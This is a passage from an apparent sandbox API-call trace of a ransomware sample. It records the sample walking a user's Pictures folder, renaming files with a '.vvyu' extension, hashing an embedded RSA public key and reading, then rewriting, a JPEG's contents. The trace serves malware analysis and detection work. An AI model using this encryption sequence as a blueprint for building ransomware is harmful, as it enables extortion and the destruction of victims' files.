lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0193.916] CloseHandle (hObject=0x584) returned 1 [0193.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee380 [0193.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8b0) returned 0x2d49778 [0193.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee380 | out: hHeap=0x6a0000) returned 1 [0193.917] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\tE1LWlZl-CqVZeW gL\\Gpf_fTIy87TJO1Dp27TE.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\te1lwlzl-cqvzew gl\\gpf_ftiy87tjo1dp27te.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\tE1LWlZl-CqVZeW gL\\Gpf_fTIy87TJO1Dp27TE.png.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\te1lwlzl-cqvzew gl\\gpf_ftiy87tjo1dp27te.png.vvyu")) returned 1 [0193.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0193.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.919] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0193.921] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a8fa990, ftCreationTime.dwHighDateTime=0x1d8a1d0, ftLastAccessTime.dwLowDateTime=0x655a02e0, ftLastAccessTime.dwHighDateTime=0x1d8a4c5, ftLastWriteTime.dwLowDateTime=0x655a02e0, ftLastWriteTime.dwHighDateTime=0x1d8a4c5, nFileSizeHigh=0x0, nFileSizeLow=0x12d8c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="K4yCl.jpg", cAlternateFileName="")) returned 1 [0193.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xbe) returned 0x2c5b3e8 [0193.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.922] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\tE1LWlZl-CqVZeW gL\\K4yCl.jpg") returned=".jpg" [0193.922] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\tE1LWlZl-CqVZeW gL\\K4yCl.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\te1lwlzl-cqvzew gl\\k4ycl.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0193.922] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=77196) returned 1 [0193.922] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0193.925] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x12d66, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.925] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0193.927] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.927] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x12d8c, lpOverlapped=0x0) returned 1 [0193.928] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0193.928] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.928] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.928] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6e9a40) returned 1 [0193.929] CryptCreateHash (in: hProv=0x6e9a40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0193.929] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.929] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0193.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0193.929] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0193.929] GetLastError () returned 0x0 [0193.929] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0193.929] CryptReleaseContext (hProv=0x6e9a40, dwFlags=0x0) returned 1 [0193.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0193.930] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0193.930] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0193.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0193.930] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0193.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0193.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x12d90) returned 0x2d49778 [0193.930] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0193.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0193.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0193.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0193.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0193.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42220 [0193.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f58 [0193.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42268 [0193.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f70 [0193.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fa0 [0193.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a000 [0193.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fb8 [0193.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0193.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0193.932] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0193.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0193.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fa0 | out: hHeap=0x6a0000) returned 1 [0193.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fb8 | out: hHeap=0x6a0000) returned 1 [0193.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a000 | out: hHeap=0x6a0000) returned 1 [0193.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0193.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a000 [0193.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0193.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39fb8 [0193.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0193.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39fa0 [0193.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0193.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x6d5c88 [0193.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0193.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0193.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0193.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0193.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0193.934] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0193.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0193.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fb8 | out: hHeap=0x6a0000) returned 1 [0193.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fa0 | out: hHeap=0x6a0000) returned 1 [0193.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0193.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0193.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a000 | out: hHeap=0x6a0000) returned 1 [0193.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0193.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0193.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0193.935] GetCurrentThreadId () returned 0x264 [0193.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0193.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d46090 [0193.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84be0 [0193.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0193.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0193.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0193.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0193.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.936] GetCurrentThreadId () returned 0x264 [0193.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2c31700 [0193.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0193.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0193.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0193.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0193.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0193.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0193.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0193.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a000 [0193.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0193.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0193.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0193.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0193.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0193.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0193.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0193.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0193.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fa0 [0193.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0193.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0193.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0193.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0193.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0193.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0193.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0193.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39fb8 [0193.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0193.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0193.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0193.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f88 [0193.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0193.940] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a018 [0193.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0193.940] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0193.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0193.940] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fe8 [0193.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0193.940] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fd0 [0193.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0193.940] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a030 [0193.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fd0 | out: hHeap=0x6a0000) returned 1 [0193.940] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39fd0 [0193.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fe8 | out: hHeap=0x6a0000) returned 1 [0193.940] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0193.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0193.940] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0193.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0193.940] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0193.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fa0 | out: hHeap=0x6a0000) returned 1 [0193.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39fa0 [0193.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0193.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0193.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a000 | out: hHeap=0x6a0000) returned 1 [0193.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0193.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a030 | out: hHeap=0x6a0000) returned 1 [0193.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0193.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0193.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0193.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0193.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0193.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fa0 | out: hHeap=0x6a0000) returned 1 [0193.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0193.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0193.942] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0193.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0193.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0193.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0193.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0193.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0193.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0193.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0193.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0193.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fd0 | out: hHeap=0x6a0000) returned 1 [0193.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0193.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a018 | out: hHeap=0x6a0000) returned 1 [0193.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0193.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fb8 | out: hHeap=0x6a0000) returned 1 [0193.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f88 | out: hHeap=0x6a0000) returned 1 [0193.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0193.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0193.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0193.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f70 | out: hHeap=0x6a0000) returned 1 [0193.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42268 | out: hHeap=0x6a0000) returned 1 [0193.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0193.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0193.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0193.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0193.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0193.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0193.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0193.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0193.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0193.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0193.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0193.948] WriteFile (in: hFile=0x584, lpBuffer=0x2d49778*, nNumberOfBytesToWrite=0x12d87, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d49778*, 